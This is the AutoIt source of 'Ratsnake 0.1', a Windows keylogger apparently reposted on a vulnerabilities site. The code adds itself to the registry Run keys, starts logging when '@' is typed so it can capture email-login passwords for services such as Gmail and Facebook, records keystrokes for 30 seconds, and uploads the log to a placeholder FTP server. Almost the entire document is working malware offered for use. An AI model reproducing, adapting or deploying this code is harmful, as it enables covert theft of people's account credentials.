; ____ ____ _____ ____ _ ; ____ ____ _____ ____ _ ____ _ __ _____
;/ __\/ _ \/__ __\/ ___\/ \ /|/ _ \/ |/ // __/
;| \/|| / \| / \ | \| |\ ||| / \|| / | \
;| /| |-|| | | \___ || | \||| |-||| \ | /_
;\_/\_\\_/ \| \_/ \____/\_/ \|\_/ \|\_|\_\\____\
;***************************************************
;* File name: ratsnake.exe ( compile me ) *
;* language: Autoit *
;* Tested on: Windows 10 *
;* release: 0.1 *
;* Author: Emiliano Febbi *
;* Site: https://nullsite.altervista.org *
;* Date: 18/02/2025 *
;*******************************************************************************************
;* Description: *
;* Simple Keylogger for Windows written in Autoit. *
;* The keylogger is activated at system startup, *
;* but begins logging only when the email address is *
;* entered for a possible login ( ex. GMAIL , Facebook , Instagram ) in order to extract *
;* the password in clear text, and deactivates itself *
;* 30 seconds later to reactivate when the system is turned on again. *
;* The logs are sent to a designated FTP, so the credentials data must be filled in. *
;*******************************************************************************************
#Include <Misc.au3>
#include <FTPEx.au3>
#include <MsgBoxConstants.au3>
#include <WinAPIFiles.au3>
;#################################################################################
;#Key registration and autorun compatible with Microsoft Edge , Chrome , Firefox #
;#################################################################################
RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "klgr", "REG_SZ", "C:\Users\pc\Downloads\ratsnake.exe")
RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "ratsnake", "REG_SZ", "C:\Users\pc\Desktop\ratsnake.exe")
;##################
;#FTP credentials #
;##################
$server = 'ftp.yoursite.org'
$username = 'ftp_user'
$pass = 'ftp_password'
$sendme = "r_logs.txt"
If FileExists($sendme) Then
;#################################
;#FTP log management and sending #
;#################################
$Open = _FTP_Open('MyFTP Control')
$Conn = _FTP_Connect($Open, $server, $username, $pass)
_FTP_FilePut($Conn, "r_logs.txt", "ratsnake_logs.txt")
$Ftpc = _FTP_Close($Open)
FileDelete("r_logs.txt")
EndIf
;###########################################
;#Keylogger activation on accounts password#
;###########################################
HotKeySet("@", "pressed")
Dim $i = 0, $PushTime = 1000
;############
;#logs file #
;############
$file = FileOpen("r_logs.txt", 1)
While 1
Sleep(100)
WEnd
Func pressed()
$i += 1
Sleep($PushTime)
Switch $i
Case 1
put(1)
Exit (0)
EndSwitch
$i = 0
EndFunc ;==>pressed
Func put($y)
$begin = TimerInit ()
While 1
;############################
;#set keylogger Timer 30secs#
;############################
$dif = TimerDiff ($begin)
if $dif > 30000 then exitloop
;##########
;#logger..#
;##########
If _IsPressed(41) Then
_LogKeyPress("a")
EndIf
If _IsPressed(42) Then
_LogKeyPress("b")
EndIf
If _IsPressed(43) Then
_LogKeyPress("c")
EndIf
If _IsPressed(44) Then
_LogKeyPress("d")
EndIf
If _IsPressed(45) Then
_LogKeyPress("e")
EndIf
If _IsPressed(46) Then
_LogKeyPress("f")
EndIf
If _IsPressed(47) Then
_LogKeyPress("g")
EndIf
If _IsPressed(48) Then
_LogKeyPress("h")
EndIf
If _IsPressed(49) Then
_LogKeyPress("i")
EndIf
If _IsPressed('4a') Then
_LogKeyPress("j")
EndIf
If _IsPressed('4b') Then
_LogKeyPress("k")
EndIf
If _IsPressed('4c') Then
_LogKeyPress("l")
EndIf
If _IsPressed('4d') Then
_LogKeyPress("m")
EndIf
If _IsPressed('4e') = 1 Then
_LogKeyPress("n")
EndIf
If _IsPressed('4f') Then
_LogKeyPress("o")
EndIf
If _IsPressed(50) Then
_LogKeyPress("p")
EndIf
If _IsPressed(51) Then
_LogKeyPress("q")
EndIf
If _IsPressed(52) Then
_LogKeyPress("r")
EndIf
If _IsPressed(53) Then
_LogKeyPress("s")
EndIf
If _IsPressed(54) Then
_LogKeyPress("t")
EndIf
If _IsPressed(55) Then
_LogKeyPress("u")
EndIf
If _IsPressed(56) Then
_LogKeyPress("v")
EndIf
If _IsPressed(57) Then
_LogKeyPress("w")
EndIf
If _IsPressed(58) Then
_LogKeyPress("x")
EndIf
If _IsPressed(59) Then
_LogKeyPress("y")
EndIf
If _IsPressed('5a') Then
_LogKeyPress("z")
EndIf
If _IsPressed('01') Then
_LogKeyPress("LEFT MOUSE")
EndIf
If _IsPressed('02') Then
_LogKeyPress("RIGHT MOUSE")
EndIf
If _IsPressed('08') Then
_LogKeyPress("BACKSPACE")
EndIf
If _IsPressed('09') Then
_LogKeyPress("TAB")
EndIf
If _IsPressed('0d') Then
_LogKeyPress("ENTER")
EndIf
If _IsPressed('10') Then
_LogKeyPress("SHIFT")
EndIf
If _IsPressed('11') Then
_LogKeyPress("CTRL")
EndIf
If _IsPressed('12') Then
_LogKeyPress("ALT")
EndIf
If _IsPressed('13') Then
_LogKeyPress("PAUSE")
EndIf
If _IsPressed('14') Then
_LogKeyPress("CAPSLOCK")
EndIf
If _IsPressed('1b') Then
_LogKeyPress("ESC")
EndIf
If _IsPressed('20') Then
_LogKeyPress("SPACE")
EndIf
If _IsPressed('21') Then
_LogKeyPress("PGUP")
EndIf
If _IsPressed('22') Then
_LogKeyPress("PGDOWN")
EndIf
If _IsPressed('23') Then
_LogKeyPress("END")
EndIf
If _IsPressed('24') Then
_LogKeyPress("HOME")
EndIf
If _IsPressed('25') Then
_LogKeyPress("LEFT ARROW")
EndIf
If _IsPressed('26') Then
_LogKeyPress("UP ARROW")
EndIf
If _IsPressed('27') Then
_LogKeyPress("RIGHT ARROW")
EndIf
If _IsPressed('28') Then
_LogKeyPress("DOWN ARROW")
EndIf
If _IsPressed('2c') Then
_LogKeyPress("PRNTSCRN")
EndIf
If _IsPressed('2d') Then
_LogKeyPress("INSERT")
EndIf
If _IsPressed('2e') Then
_LogKeyPress("DEL")
EndIf
If _IsPressed('30') Then
_LogKeyPress("0")
EndIf
If _IsPressed('31') Then
_LogKeyPress("1")
EndIf
If _IsPressed('32') Then
_LogKeyPress("2")
EndIf
If _IsPressed('33') Then
_LogKeyPress("3")
EndIf
If _IsPressed('34') Then
_LogKeyPress("4")
EndIf
If _IsPressed('35') Then
_LogKeyPress("5")
EndIf
If _IsPressed('36') Then
_LogKeyPress("6")
EndIf
If _IsPressed('37') Then
_LogKeyPress("7")
EndIf
If _IsPressed('38') Then
_LogKeyPress("8")
EndIf
If _IsPressed('39') Then
_LogKeyPress("9")
EndIf
;######################
;#Special Chars logger#
;######################
If _IsPressed('A0') And _IsPressed('30') Then
_LogKeyPress(")")
EndIf
If _IsPressed('A0') And _IsPressed('31') Then
_LogKeyPress("!")
EndIf
If _IsPressed('A0') And _IsPressed('32') Then
_LogKeyPress("@")
EndIf
If _IsPressed('A0') And _IsPressed('33') Then
_LogKeyPress("#")
EndIf
If _IsPressed('A0') And _IsPressed('34') Then
_LogKeyPress("$")
EndIf
If _IsPressed('A0') And _IsPressed('35') Then
_LogKeyPress("%")
EndIf
If _IsPressed('A0') And _IsPressed('36') Then
_LogKeyPress("^")
EndIf
If _IsPressed('A0') And _IsPressed('37') Then
_LogKeyPress("&")
EndIf
If _IsPressed('A0') And _IsPressed('38') Then
_LogKeyPress("*")
EndIf
If _IsPressed('A0') And _IsPressed('39') Then
_LogKeyPress("(")
EndIf
If _IsPressed('A0') And _IsPressed('BA') Then
_LogKeyPress(":")
EndIf
If _IsPressed('A0') And _IsPressed('BB') Then
_LogKeyPress("+")
EndIf
If _IsPressed('A0') And _IsPressed('BC') Then
_LogKeyPress("<")
EndIf
If _IsPressed('A0') And _IsPressed('BD') Then
_LogKeyPress("_")
EndIf
If _IsPressed('A0') And _IsPressed('BE') Then
_LogKeyPress(">")
EndIf
If _IsPressed('A0') And _IsPressed('BF') Then
_LogKeyPress("?")
EndIf
If _IsPressed('A0') And _IsPressed('C0') Then
_LogKeyPress("~")
EndIf
If _IsPressed('A0') And _IsPressed('DB') Then
_LogKeyPress("{")
EndIf
If _IsPressed('A0') And _IsPressed('DC') Then
_LogKeyPress("|")
EndIf
If _IsPressed('A0') And _IsPressed('DD') Then
_LogKeyPress("}")
EndIf
If _IsPressed('A0') And _IsPressed('DE') Then
_LogKeyPress('"')
EndIf
WEnd
Sleep(50)
EndFunc ;==>put
;###################
;#File logs writing#
;###################
Func _LogKeyPress($what2log)
FileWriteLine($file, "[ " &@MDAY & ". " &@MON & ". " &@YEAR & " " &@HOUR & ":" &@MIN & ":" &@SEC & " ] " & "Pressed Button: " & $what2log)
sleep ("150")
EndFunc
FileClose($file)
Func MyExit ()
Exit
EndFunc
Ratsnake 0.1
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 103